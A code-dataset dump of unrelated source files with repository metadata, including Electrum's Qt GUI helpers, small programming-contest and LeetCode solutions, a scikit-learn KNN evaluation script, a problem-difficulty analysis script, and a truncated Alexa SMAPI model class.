class CancelButton(QPushButton):
def __init__(self, dialog, label=None):
QPushButton.__init__(self, label or _("Cancel"))
self.clicked.connect(dialog.reject)
class MessageBoxMixin(object):
def top_level_window_recurse(self, window=None, test_func=None):
window = window or self
classes = (WindowModalDialog, QMessageBox)
if test_func is None:
test_func = lambda x: True
for n, child in enumerate(window.children()):
# Test for visibility as old closed dialogs may not be GC-ed.
# Only accept children that confirm to test_func.
if isinstance(child, classes) and child.isVisible() \
and test_func(child):
return self.top_level_window_recurse(child, test_func=test_func)
return window
def top_level_window(self, test_func=None):
return self.top_level_window_recurse(test_func)
def question(self, msg, parent=None, title=None, icon=None, **kwargs) -> bool:
Yes, No = QMessageBox.Yes, QMessageBox.No
return Yes == self.msg_box(icon=icon or QMessageBox.Question,
parent=parent,
title=title or '',
text=msg,
buttons=Yes|No,
defaultButton=No,
**kwargs)
def show_warning(self, msg, parent=None, title=None, **kwargs):
return self.msg_box(QMessageBox.Warning, parent,
title or _('Warning'), msg, **kwargs)
def show_error(self, msg, parent=None, **kwargs):
return self.msg_box(QMessageBox.Warning, parent,
_('Error'), msg, **kwargs)
def show_critical(self, msg, parent=None, title=None, **kwargs):
return self.msg_box(QMessageBox.Critical, parent,
title or _('Critical Error'), msg, **kwargs)
def show_message(self, msg, parent=None, title=None, **kwargs):
return self.msg_box(QMessageBox.Information, parent,
title or _('Information'), msg, **kwargs)
def msg_box(self, icon, parent, title, text, *, buttons=QMessageBox.Ok,
defaultButton=QMessageBox.NoButton, rich_text=False,
checkbox=None):
parent = parent or self.top_level_window()
return custom_message_box(icon=icon,
parent=parent,
title=title,
text=text,
buttons=buttons,
defaultButton=defaultButton,
rich_text=rich_text,
checkbox=checkbox)
def custom_message_box(*, icon, parent, title, text, buttons=QMessageBox.Ok,
defaultButton=QMessageBox.NoButton, rich_text=False,
checkbox=None):
if type(icon) is QPixmap:
d = QMessageBox(QMessageBox.Information, title, str(text), buttons, parent)
d.setIconPixmap(icon)
else:
d = QMessageBox(icon, title, str(text), buttons, parent)
d.setWindowModality(Qt.WindowModal)
d.setDefaultButton(defaultButton)
if rich_text:
d.setTextInteractionFlags(Qt.TextSelectableByMouse | Qt.LinksAccessibleByMouse)
# set AutoText instead of RichText
# AutoText lets Qt figure out whether to render as rich text.
# e.g. if text is actually plain text and uses "\n" newlines;
# and we set RichText here, newlines would be swallowed
d.setTextFormat(Qt.AutoText)
else:
d.setTextInteractionFlags(Qt.TextSelectableByMouse)
d.setTextFormat(Qt.PlainText)
if checkbox is not None:
d.setCheckBox(checkbox)
return d.exec_()
class WindowModalDialog(QDialog, MessageBoxMixin):
'''Handy wrapper; window modal dialogs are better for our multi-window
daemon model as other wallet windows can still be accessed.'''
def __init__(self, parent, title=None):
QDialog.__init__(self, parent)
self.setWindowModality(Qt.WindowModal)
if title:
self.setWindowTitle(title)
class WaitingDialog(WindowModalDialog):
'''Shows a please wait dialog whilst running a task. It is not
necessary to maintain a reference to this dialog.'''
def __init__(self, parent, message, task, on_success=None, on_error=None):
assert parent
if isinstance(parent, MessageBoxMixin):
parent = parent.top_level_window()
WindowModalDialog.__init__(self, parent, _("Please wait"))
vbox = QVBoxLayout(self)
vbox.addWidget(QLabel(message))
self.accepted.connect(self.on_accepted)
self.show()
self.thread = TaskThread(self)
self.thread.finished.connect(self.deleteLater) # see #3956
self.thread.add(task, on_success, self.accept, on_error)
def wait(self):
self.thread.wait()
def on_accepted(self):
self.thread.stop()
def line_dialog(parent, title, label, ok_label, default=None):
dialog = WindowModalDialog(parent, title)
dialog.setMinimumWidth(500)
l = QVBoxLayout()
dialog.setLayout(l)
l.addWidget(QLabel(label))
txt = QLineEdit()
if default:
txt.setText(default)
l.addWidget(txt)
l.addLayout(Buttons(CancelButton(dialog), OkButton(dialog, ok_label)))
if dialog.exec_():
return txt.text()
def text_dialog(parent, title, header_layout, ok_label, default=None, allow_multi=False):
from .qrtextedit import ScanQRTextEdit
dialog = WindowModalDialog(parent, title)
dialog.setMinimumWidth(600)
l = QVBoxLayout()
dialog.setLayout(l)
if isinstance(header_layout, str):
l.addWidget(QLabel(header_layout))
else:
l.addLayout(header_layout)
txt = ScanQRTextEdit(allow_multi=allow_multi)
if default:
txt.setText(default)
l.addWidget(txt)
l.addLayout(Buttons(CancelButton(dialog), OkButton(dialog, ok_label)))
if dialog.exec_():
return txt.toPlainText()
class ChoicesLayout(object):
def __init__(self, msg, choices, on_clicked=None, checked_index=0):
vbox = QVBoxLayout()
if len(msg) > 50:
vbox.addWidget(WWLabel(msg))
msg = ""
gb2 = QGroupBox(msg)
vbox.addWidget(gb2)
vbox2 = QVBoxLayout()
gb2.setLayout(vbox2)
self.group = group = QButtonGroup()
for i,c in enumerate(choices):
button = QRadioButton(gb2)
button.setText(c)
vbox2.addWidget(button)
group.addButton(button)
group.setId(button, i)
if i==checked_index:
button.setChecked(True)
if on_clicked:
group.buttonClicked.connect(partial(on_clicked, self))
self.vbox = vbox
def layout(self):
return self.vbox
def selected_index(self):
return self.group.checkedId()
def address_field(addresses):
hbox = QHBoxLayout()
address_e = QLineEdit()
if addresses and len(addresses) > 0:
address_e.setText(addresses[0])
else:
addresses = []
def func():
try:
i = addresses.index(str(address_e.text())) + 1
i = i % len(addresses)
address_e.setText(addresses[i])
except ValueError:
# the user might have changed address_e to an
# address not in the wallet (or to something that isn't an address)
if addresses and len(addresses) > 0:
address_e.setText(addresses[0])
button = QPushButton(_('Address'))
button.clicked.connect(func)
hbox.addWidget(button)
hbox.addWidget(address_e)
return hbox, address_e
def filename_field(parent, config, defaultname, select_msg):
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Format")))
gb = QGroupBox("format", parent)
b1 = QRadioButton(gb)
b1.setText(_("CSV"))
b1.setChecked(True)
b2 = QRadioButton(gb)
b2.setText(_("json"))
vbox.addWidget(b1)
vbox.addWidget(b2)
hbox = QHBoxLayout()
directory = config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, defaultname )
filename_e = QLineEdit()
filename_e.setText(path)
def func():
text = filename_e.text()
_filter = "*.csv" if text.endswith(".csv") else "*.json" if text.endswith(".json") else None
p, __ = QFileDialog.getSaveFileName(None, select_msg, text, _filter)
if p:
filename_e.setText(p)
button = QPushButton(_('File'))
button.clicked.connect(func)
hbox.addWidget(button)
hbox.addWidget(filename_e)
vbox.addLayout(hbox)
def set_csv(v):
text = filename_e.text()
text = text.replace(".json",".csv") if v else text.replace(".csv",".json")
filename_e.setText(text)
b1.clicked.connect(lambda: set_csv(True))
b2.clicked.connect(lambda: set_csv(False))
return vbox, filename_e, b1
class ElectrumItemDelegate(QStyledItemDelegate):
def __init__(self, tv):
super().__init__(tv)
self.tv = tv
self.opened = None
def on_closeEditor(editor: QLineEdit, hint):
self.opened = None
def on_commitData(editor: QLineEdit):
new_text = editor.text()
idx = QModelIndex(self.opened)
row, col = idx.row(), idx.column()
_prior_text, user_role = self.tv.text_txid_from_coordinate(row, col)
# check that we didn't forget to set UserRole on an editable field
assert user_role is not None, (row, col)
self.tv.on_edited(idx, user_role, new_text)
self.closeEditor.connect(on_closeEditor)
self.commitData.connect(on_commitData)
def createEditor(self, parent, option, idx):
self.opened = QPersistentModelIndex(idx)
return super().createEditor(parent, option, idx)
class MyTreeView(QTreeView):
def __init__(self, parent: 'ElectrumWindow', create_menu, stretch_column=None, editable_columns=None):
super().__init__(parent)
self.parent = parent
self.config = self.parent.config
self.stretch_column = stretch_column
self.setContextMenuPolicy(Qt.CustomContextMenu)
self.customContextMenuRequested.connect(create_menu)
self.setUniformRowHeights(True)
# Control which columns are editable
if editable_columns is None:
editable_columns = {stretch_column}
else:
editable_columns = set(editable_columns)
self.editable_columns = editable_columns
self.setItemDelegate(ElectrumItemDelegate(self))
self.current_filter = ""
self.setRootIsDecorated(False) # remove left margin
self.toolbar_shown = False
# When figuring out the size of columns, Qt by default looks at
# the first 1000 rows (at least if resize mode is QHeaderView.ResizeToContents).
# This would be REALLY SLOW, and it's not perfect anyway.
# So to speed the UI up considerably, set it to
# only look at as many rows as currently visible.
self.header().setResizeContentsPrecision(0)
def set_editability(self, items):
for idx, i in enumerate(items):
i.setEditable(idx in self.editable_columns)
def selected_in_column(self, column: int):
items = self.selectionModel().selectedIndexes()
return list(x for x in items if x.column() == column)
def current_item_user_role(self, col) -> Optional[QStandardItem]:
idx = self.selectionModel().currentIndex()
idx = idx.sibling(idx.row(), col)
item = self.model().itemFromIndex(idx)
if item:
return item.data(Qt.UserRole)
def set_current_idx(self, set_current: QPersistentModelIndex):
if set_current:
assert isinstance(set_current, QPersistentModelIndex)
assert set_current.isValid()
self.selectionModel().select(QModelIndex(set_current), QItemSelectionModel.SelectCurrent)
def update_headers(self, headers: Union[List[str], Dict[int, str]]):
# headers is either a list of column names, or a dict: (col_idx->col_name)
if not isinstance(headers, dict): # convert to dict
headers = dict(enumerate(headers))
col_names = [headers[col_idx] for col_idx in sorted(headers.keys())]
model = self.model()
model.setHorizontalHeaderLabels(col_names)
self.header().setStretchLastSection(False)
self.header().setDefaultAlignment(Qt.AlignCenter)
for col_idx in headers:
sm = QHeaderView.Stretch if col_idx == self.stretch_column else QHeaderView.ResizeToContents
self.header().setSectionResizeMode(col_idx, sm)
def keyPressEvent(self, event):
if self.itemDelegate().opened:
return
if event.key() in [ Qt.Key_F2, Qt.Key_Return ]:
self.on_activated(self.selectionModel().currentIndex())
return
super().keyPressEvent(event)
def on_activated(self, idx):
# on 'enter' we show the menu
pt = self.visualRect(idx).bottomLeft()
pt.setX(50)
self.customContextMenuRequested.emit(pt)
def edit(self, idx, trigger=QAbstractItemView.AllEditTriggers, event=None):
"""
this is to prevent:
edit: editing failed
from inside qt
"""
return super().edit(idx, trigger, event)
def on_edited(self, idx: QModelIndex, user_role, text):
self.parent.wallet.set_label(user_role, text)
self.parent.history_model.refresh('on_edited in MyTreeView')
self.parent.update_completions()
def should_hide(self, row):
"""
row_num is for self.model(). So if there is a proxy, it is the row number
in that!
"""
return False
def text_txid_from_coordinate(self, row_num, column):
assert not isinstance(self.model(), QSortFilterProxyModel)
idx = self.model().index(row_num, column)
item = self.model().itemFromIndex(idx)
user_role = item.data(Qt.UserRole)
return item.text(), user_role
def hide_row(self, row_num):
"""
row_num is for self.model(). So if there is a proxy, it is the row number
in that!
"""
should_hide = self.should_hide(row_num)
if not self.current_filter and should_hide is None:
# no filters at all, neither date nor search
self.setRowHidden(row_num, QModelIndex(), False)
return
for column in self.filter_columns:
txt, _ = self.text_txid_from_coordinate(row_num, column)
txt = txt.lower()
if self.current_filter in txt:
# the filter matched, but the date filter might apply
self.setRowHidden(row_num, QModelIndex(), bool(should_hide))
break
else:
# we did not find the filter in any columns, hide the item
self.setRowHidden(row_num, QModelIndex(), True)
def filter(self, p=None):
if p is not None:
p = p.lower()
self.current_filter = p
self.hide_rows()
def hide_rows(self):
for row in range(self.model().rowCount()):
self.hide_row(row)
def create_toolbar(self, config=None):
hbox = QHBoxLayout()
buttons = self.get_toolbar_buttons()
for b in buttons:
b.setVisible(False)
hbox.addWidget(b)
hide_button = QPushButton('x')
hide_button.setVisible(False)
hide_button.pressed.connect(lambda: self.show_toolbar(False, config))
self.toolbar_buttons = buttons + (hide_button,)
hbox.addStretch()
hbox.addWidget(hide_button)
return hbox
def save_toolbar_state(self, state, config):
pass # implemented in subclasses
def show_toolbar(self, state, config=None):
if state == self.toolbar_shown:
return
self.toolbar_shown = state
if config:
self.save_toolbar_state(state, config)
for b in self.toolbar_buttons:
b.setVisible(state)
if not state:
self.on_hide_toolbar()
def toggle_toolbar(self, config=None):
self.show_toolbar(not self.toolbar_shown, config)
class ButtonsWidget(QWidget):
def __init__(self):
super(QWidget, self).__init__()
self.buttons = []
def resizeButtons(self):
frameWidth = self.style().pixelMetric(QStyle.PM_DefaultFrameWidth)
x = self.rect().right() - frameWidth
y = self.rect().bottom() - frameWidth
for button in self.buttons:
sz = button.sizeHint()
x -= sz.width()
button.move(x, y - sz.height())
def addButton(self, icon_name, on_click, tooltip):
button = QToolButton(self)
button.setIcon(read_QIcon(icon_name))
iconSize = QLineEdit().sizeHint().height() - 7 # 3px (button sz - icon sz), 2px borders, 2px padding
button.setIconSize(QSize(iconSize, iconSize))
button.setCursor(QCursor(Qt.PointingHandCursor))
button.setStyleSheet("QToolButton { border: none; hover {border: 1px} pressed {border: 1px} padding: 0px; }")
button.setVisible(True)
button.setToolTip(tooltip)
button.clicked.connect(on_click)
self.buttons.append(button)
return button
def addCopyButton(self, app):
self.app = app
self.addButton("copy.png", self.on_copy, _("Copy to clipboard"))
def on_copy(self):
self.app.clipboard().setText(self.text())
QToolTip.showText(QCursor.pos(), _("Text copied to clipboard"), self)
class ButtonsLineEdit(QLineEdit, ButtonsWidget):
def __init__(self, text=None):
QLineEdit.__init__(self, text)
self.buttons = []
def resizeEvent(self, e):
o = QLineEdit.resizeEvent(self, e)
self.resizeButtons()
return o
class ButtonsTextEdit(QPlainTextEdit, ButtonsWidget):
def __init__(self, text=None):
QPlainTextEdit.__init__(self, text)
self.setText = self.setPlainText
self.text = self.toPlainText
self.buttons = []
def resizeEvent(self, e):
o = QPlainTextEdit.resizeEvent(self, e)
self.resizeButtons()
return o
class TaskThread(QThread):
'''Thread that runs background tasks. Callbacks are guaranteed
to happen in the context of its parent.'''
class Task(NamedTuple):
task: Callable
cb_success: Optional[Callable]
cb_done: Optional[Callable]
cb_error: Optional[Callable]
doneSig = pyqtSignal(object, object, object)
def __init__(self, parent, on_error=None):
super(TaskThread, self).__init__(parent)
self.on_error = on_error
self.tasks = queue.Queue()
self.doneSig.connect(self.on_done)
self.start()
def add(self, task, on_success=None, on_done=None, on_error=None):
on_error = on_error or self.on_error
self.tasks.put(TaskThread.Task(task, on_success, on_done, on_error))
def run(self):
while True:
task = self.tasks.get() # type: TaskThread.Task
if not task:
break
try:
result = task.task()
self.doneSig.emit(result, task.cb_done, task.cb_success)
except BaseException:
self.doneSig.emit(sys.exc_info(), task.cb_done, task.cb_error)
def on_done(self, result, cb_done, cb_result):
# This runs in the parent's thread.
if cb_done:
cb_done()
if cb_result:
cb_result(result)
def stop(self):
self.tasks.put(None)
class ColorSchemeItem:
def __init__(self, fg_color, bg_color):
self.colors = (fg_color, bg_color)
def _get_color(self, background):
return self.colors[(int(background) + int(ColorScheme.dark_scheme)) % 2]
def as_stylesheet(self, background=False):
css_prefix = "background-" if background else ""
color = self._get_color(background)
return "QWidget {{ {}color:{}; }}".format(css_prefix, color)
def as_color(self, background=False):
color = self._get_color(background)
return QColor(color)
class ColorScheme:
dark_scheme = False
GREEN = ColorSchemeItem("#117c11", "#8af296")
YELLOW = ColorSchemeItem("#897b2a", "#ffff00")
RED = ColorSchemeItem("#7c1111", "#f18c8c")
BLUE = ColorSchemeItem("#123b7c", "#8cb3f2")
PURPLE = ColorSchemeItem("#8A2BE2", "#8A2BE2")
DEFAULT = ColorSchemeItem("#818181", "white")
@staticmethod
def has_dark_background(widget):
brightness = sum(widget.palette().color(QPalette.Background).getRgb()[0:3])
return brightness < (255*3/2)
@staticmethod
def update_from_widget(widget, force_dark=False):
if force_dark or ColorScheme.has_dark_background(widget):
ColorScheme.dark_scheme = True
class AcceptFileDragDrop:
def __init__(self, file_type=""):
assert isinstance(self, QWidget)
self.setAcceptDrops(True)
self.file_type = file_type
def validateEvent(self, event):
if not event.mimeData().hasUrls():
event.ignore()
return False
for url in event.mimeData().urls():
if not url.toLocalFile().endswith(self.file_type):
event.ignore()
return False
event.accept()
return True
def dragEnterEvent(self, event):
self.validateEvent(event)
def dragMoveEvent(self, event):
if self.validateEvent(event):
event.setDropAction(Qt.CopyAction)
def dropEvent(self, event):
if self.validateEvent(event):
for url in event.mimeData().urls():
self.onFileAdded(url.toLocalFile())
def onFileAdded(self, fn):
raise NotImplementedError()
def import_meta_gui(electrum_window, title, importer, on_success):
filter_ = "JSON (*.json);;All files (*)"
filename = electrum_window.getOpenFileName(_("Open {} file").format(title), filter_)
if not filename:
return
try:
importer(filename)
except FileImportFailed as e:
electrum_window.show_critical(str(e))
else:
electrum_window.show_message(_("Your {} were successfully imported").format(title))
on_success()
def export_meta_gui(electrum_window, title, exporter):
filter_ = "JSON (*.json);;All files (*)"
filename = electrum_window.getSaveFileName(_("Select file to save your {}").format(title),
'electrum_{}.json'.format(title), filter_)
if not filename:
return
try:
exporter(filename)
except FileExportFailed as e:
electrum_window.show_critical(str(e))
else:
electrum_window.show_message(_("Your {0} were exported to '{1}'")
.format(title, str(filename)))
def get_parent_main_window(widget):
"""Returns a reference to the ElectrumWindow this widget belongs to."""
from .main_window import ElectrumWindow
for _ in range(100):
if widget is None:
return None
if not isinstance(widget, ElectrumWindow):
widget = widget.parentWidget()
else:
return widget
return None
def icon_path(icon_basename):
return resource_path('gui', 'icons', icon_basename)
@lru_cache(maxsize=1000)
def read_QIcon(icon_basename):
return QIcon(icon_path(icon_basename))
def get_default_language():
name = QLocale.system().name()
return name if name in languages else 'en_UK'
class FromList(QTreeWidget):
def __init__(self, parent, create_menu):
super().__init__(parent)
self.setHeaderHidden(True)
self.setMaximumHeight(300)
self.setContextMenuPolicy(Qt.CustomContextMenu)
self.customContextMenuRequested.connect(create_menu)
self.setUniformRowHeights(True)
# remove left margin
self.setRootIsDecorated(False)
self.setColumnCount(2)
self.header().setStretchLastSection(False)
sm = QHeaderView.ResizeToContents
self.header().setSectionResizeMode(0, sm)
self.header().setSectionResizeMode(1, sm)
def char_width_in_lineedit() -> int:
char_width = QFontMetrics(QLineEdit().font()).averageCharWidth()
# 'averageCharWidth' seems to underestimate on Windows, hence 'max()'
return max(9, char_width)
def webopen(url: str):
if sys.platform == 'linux' and os.environ.get('APPIMAGE'):
# When on Linux webbrowser.open can fail in AppImage because it can't find the correct libdbus.
# We just fork the process and unset LD_LIBRARY_PATH before opening the URL.
# See #5425
if os.fork() == 0:
del os.environ['LD_LIBRARY_PATH']
webbrowser.open(url)
sys.exit(0)
else:
webbrowser.open(url)
if __name__ == "__main__":
app = QApplication([])
t = WaitingDialog(None, 'testing ...', lambda: [time.sleep(1)], lambda x: QMessageBox.information(None, 'done', "done"))
t.start()
app.exec_()
| [
"[email protected]"
] | |
e218ccbde421b4913b280795d031f3fc87789818 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_199/773.py | 30a001a8f7c676f7eb2fe925665c826df0915c48 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 705 | py | # Problem A. Oversized Pancake Flipper
import os
SOURCE = '%s/../Resources/Q1Al.in' % os.path.dirname(__file__)
TARGET = '%s/../Resources/Q1Al.out' % os.path.dirname(__file__)
INPUT = open(SOURCE).read().splitlines()
OUTPUT = open(TARGET, 'w')
T = int(INPUT.pop(0))
for t0 in xrange(T):
print >> OUTPUT, 'Case #%d:' % (t0 + 1),
S, K = INPUT.pop(0).split()
A, K = ['+' == s for s in S], int(K)
L = len(A)
r = 0
for i, a in enumerate(A):
if not a:
if i + K > L:
print >> OUTPUT, 'IMPOSSIBLE'
break
r += 1
for k in xrange(K):
A[i+k] = not A[i+k]
else:
print >> OUTPUT, r
| [
"[email protected]"
] | |
30bab34cfeff4c18f9f343631ed0cdb6410ae39a | baf3996414315ffb60470c40c7ad797bf4e6897f | /02_ai/1_ml/3_data_preparation/code/chapter_18/02_model_evaluation.py | c6093bdc54ef4415a5811861005577357adb543d | [
"MIT"
] | permissive | thiago-allue/portfolio | 8fbbecca7ce232567aebe97c19944f444508b7f4 | 0acd8253dc7c5150fef9b2d46eead3db83ca42de | refs/heads/main | 2023-03-15T22:10:21.109707 | 2022-09-14T17:04:35 | 2022-09-14T17:04:35 | 207,919,073 | 0 | 0 | null | 2019-11-13T18:18:23 | 2019-09-11T22:40:46 | Python | UTF-8 | Python | false | false | 955 | py | # evaluate knn on the raw diabetes dataset
from numpy import mean
from numpy import std
from pandas import read_csv
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import RepeatedStratifiedKFold
from sklearn.neighbors import KNeighborsClassifier
from sklearn.preprocessing import LabelEncoder
# load dataset
dataset = read_csv('pima-indians-diabetes.csv', header=None)
data = dataset.values
# separate into input and output columns
X, y = data[:, :-1], data[:, -1]
# ensure inputs are floats and output is an integer label
X = X.astype('float32')
y = LabelEncoder().fit_transform(y.astype('str'))
# define and configure the model
model = KNeighborsClassifier()
# evaluate the model
cv = RepeatedStratifiedKFold(n_splits=10, n_repeats=3, random_state=1)
n_scores = cross_val_score(model, X, y, scoring='accuracy', cv=cv, n_jobs=-1)
# report model performance
print('Accuracy: %.3f (%.3f)' % (mean(n_scores), std(n_scores))) | [
"[email protected]"
] | |
7bf358f112e3ef7aa77ff185a38d1f372ce35085 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/data_analyze.py | 1b53f51941b2a5bab76c5647d28bf9d31e0e44bf | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,937 | py | """
数据分析
详细研究过程见研究报告
"""
import json
import pandas as pd
import numpy as np
from decimal import Decimal
pd.set_option('display.unicode.ambiguous_as_wide', True)
pd.set_option('display.unicode.east_asian_width', True)
def save_as_file(data: dict, filename):
with open(filename, 'w', encoding='utf-8')as json_file:
json.dump(data, json_file, ensure_ascii=False, indent=4)
def get_difficulty(data):
d = [] # 题目难度
u = [] # 上传率
li = [] # 代码行数
avg = []
avg_all = [] # 算术平均数
num_of_cases = []
for types in data.items():
avg.append(types[1]["avg_pass_rate"])
cor_pu = (types[1]["correlation_pu"]) # 通过率与上传率的相关系数
cor_pl = (types[1]["correlation_pl"]) # 通过率与代码行数的相关系数
for cases in types[1].items(): # 类别
if cases[0] == 'cases':
print(types[0], len(cases[1]))
num_of_cases.append([types[0], len(cases[1])])
for case in cases[1].items():
u.append(case[1]["up_rate"]*cor_pu)
li.append(case[1]["avg_lines"]*cor_pl)
d.append((1 - case[1]["pass_rate"])) # 1-该题通过率
avg_all.append(case[1]["pass_rate"])
# 映射到区间[1,5]
d1 = map_to(1, 5, d) # 映射后的试题难度
u1 = map_to(1, 5, u)
li1 = map_to(1, 5, li)
final_d = []
for i in range(0, len(d1)):
# 用上传次数和代码行数进行修正
final_d.append(get_final_d(d1[i], u1[i], li1[i], 0.846, 0.084))
cnt_easy = 0
cnt_medium = 0
cnt_hard = 0
for di in final_d:
if 1 <= di < 2.2: # 通过率70% easy
cnt_easy += 1
elif 2.2 <= di < 3.4: # 通过率70%-40% medium
cnt_medium += 1
else: # 通过率40%以下 hard
cnt_hard += 1
print("easy: ", cnt_easy, cnt_easy/882)
print("medium: ", cnt_medium, cnt_medium/882)
print("hard: ", cnt_hard, cnt_hard/882)
print("难度系数均值:", np.mean(final_d))
print("修正前通过率均值:", np.mean(avg_all))
print("修正后均值:", 1-np.mean(map_to(0, 1, final_d)))
print(avg)
return final_d
def get_final_d(k, m, n, alpha, beta): # 获取修正后的难度系数
return alpha*k + beta*m + (1-alpha-beta)*n
def get_diff_by_degree(degree): # 根据难度系数获取题目难度
if 1 <= degree < 2.2:
return "easy"
elif 2.2 <= degree < 3.4:
return "medium"
else:
return "hard"
def geometric_mean(data): # 计算几何平均数
total = 1
for i in data:
if i == 0:
continue
total *= Decimal(str(format(i, ".2f")))
# print(float(format(i, ".2f")))
return total ** Decimal(1.0/len(data))
def map_to(start, end, data): # 将数据映射到指定区间
d_min = np.min(data)
d_max= np.max(data)
res = []
for d in data:
res.append(start+(end-start)/(d_max-d_min)*(d-d_min))
return res
def get_result(data, final_d):
res = {}
i = 0
for types in data.items():
if types[0] not in res.keys():
res[types[0]] = {"cases": types[1]}
for cid, case in types[1].items():
res[types[0]]["cases"][cid] = case
res[types[0]]["cases"][cid]["degree"] = final_d[i]
res[types[0]]["cases"][cid]["difficulty"] = get_diff_by_degree(final_d[i])
i += 1
print(i)
return res
if __name__ == "__main__":
with open("../Data/final_data_v2.json", 'r', encoding="utf-8") as f:
_data = json.loads(f.read())
final_data = get_difficulty(_data)
with open("../Data/final_data.json", 'r', encoding="utf-8") as f:
_data = json.loads(f.read())
result = get_result(_data, final_data)
# save_as_file(result, "../Data/result.json")
| [
"[email protected]"
] | |
b5956f1a4f170c496cdc206d745f9cb2a1b5f2c9 | 10b74a5b6e678e51853611645f7898d2d28eccf8 | /player117.py | 50a13f63fd40e20f130faa5e2c303af0c1080256 | [] | no_license | tigervanilla/Guvi | a31ce1838707c71976a23fd5b25f5ebd9e0656ef | f9363f46f23d8a9b17a14f3d83322f59944a444b | refs/heads/master | 2020-04-01T02:44:43.767502 | 2019-04-18T04:58:40 | 2019-04-18T04:58:40 | 152,793,355 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 78 | py | a=input()
a=a[::-1]
print(a[0],end='')
for i in a[1:]:
print('-'+i,end='') | [
"[email protected]"
] | |
c380425895250438ccfe619d806e2cc74a449d63 | f63dc9959bbd596c04f70f671f9b0cbc70adb552 | /env/lib/python3.6/_bootlocale.py | 7d49875e50ddc0d5b5d4af50922354e7dda4ee93 | [] | no_license | paulfranco/imd_api | efa4e5d5399fea191f215d2a8d907adfb55ab31a | 1889290b5596fd1a020c336cc7c28d8521785a15 | refs/heads/master | 2020-03-16T06:30:31.077649 | 2018-05-09T02:10:03 | 2018-05-09T02:10:03 | 132,556,482 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 56 | py | /Users/paulfranco/anaconda3/lib/python3.6/_bootlocale.py | [
"[email protected]"
] | |
c7f5f003abb3040b1524784d99a06585be3ae3cc | 5afd733a5c1f753601c69b8b4eae1b49edfbae7c | /1-100/26.py | fa36e700d0e1f5ab060ef83dfb14183c587f6ef8 | [] | no_license | yanbinbi/leetcode | 9dcd4a0160be915006455b83d6b7cd39e9819811 | 616a868bfa7bdd00195067b0477b0236a72d23e0 | refs/heads/master | 2021-05-13T19:34:17.222576 | 2017-11-12T02:04:31 | 2017-11-12T02:04:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 391 | py | class Solution(object):
def removeDuplicates(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
size = len(nums)
if size == 0:
return 0
j = 0
for i in range(1,size):
if nums[i] > nums[j]:
j += 1
if i != j:
nums[j] = nums[i]
return j+1
| [
"[email protected]"
] | |
aa034bd935af2335c3c1651436ae7001c1fde500 | a4525c981552117dabdf5f952ced15997199da32 | /ask-smapi-model/ask_smapi_model/v1/skill/interaction_model/model_type/slot_type_definition_output.py | 5a60b84255908d1a8d2553d4ce4a24b9d61f9ea7 | [
"Apache-2.0"
] | permissive | muskanmahajan37/alexa-apis-for-python | 29b3b8e45bb009fa56ba0a2a73ed2f50efe77f65 | 8e0c90a3031f5afd8a2e62d19b51fe392e7da1af | refs/heads/master | 2022-11-09T01:14:58.947495 | 2020-06-25T17:33:19 | 2020-06-25T17:33:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,919 | py | # coding: utf-8
#
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file
# except in compliance with the License. A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for
# the specific language governing permissions and limitations under the License.
#
import pprint
import re # noqa: F401
import six
import typing
from enum import Enum
if typing.TYPE_CHECKING:
from typing import Dict, List, Optional, Union
from datetime import datetime
from ask_smapi_model.v1.skill.interaction_model.model_type.slot_type_input import SlotTypeInputV1
class SlotTypeDefinitionOutput(object):
"""
Slot Type request definitions.
:param slot_type:
:type slot_type: (optional) ask_smapi_model.v1.skill.interaction_model.model_type.slot_type_input.SlotTypeInput
:param total_versions: Total number of versions.
:type total_versions: (optional) str
"""
deserialized_types = {
'slot_type': 'ask_smapi_model.v1.skill.interaction_model.model_type.slot_type_input.SlotTypeInput',
'total_versions': 'str'
} # type: Dict
attribute_map = {
'slot_type': 'slotType',
'total_versions': 'totalVersions'
} # type: Dict
supports_multiple_types = False
def __init__(self, slot_type=None, total_versions=None):
# type: (Optional[SlotTypeInputV1], Optional[str]) -> None
"""Slot Type request definitions.
:param slot_type:
:type slot_type: (optional) ask_smapi_model.v1.skill.interaction_model.model_type.slot_type_input.SlotTypeInput
:param total_versions: Total number of versions.
:type total_versions: (optional) str
"""
self.__discriminator_value = None # type: str
self.slot_type = slot_type
self.total_versions = total_versions
def to_dict(self):
# type: () -> Dict[str, object]
"""Returns the model properties as a dict"""
result = {} # type: Dict
for attr, _ in six.iteritems(self.deserialized_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else
x.value if isinstance(x, Enum) else x,
value
))
elif isinstance(value, Enum):
result[attr] = value.value
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else
(item[0], item[1].value)
if isinstance(item[1], Enum) else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
# type: () -> str
"""Returns the string representation of the model"""
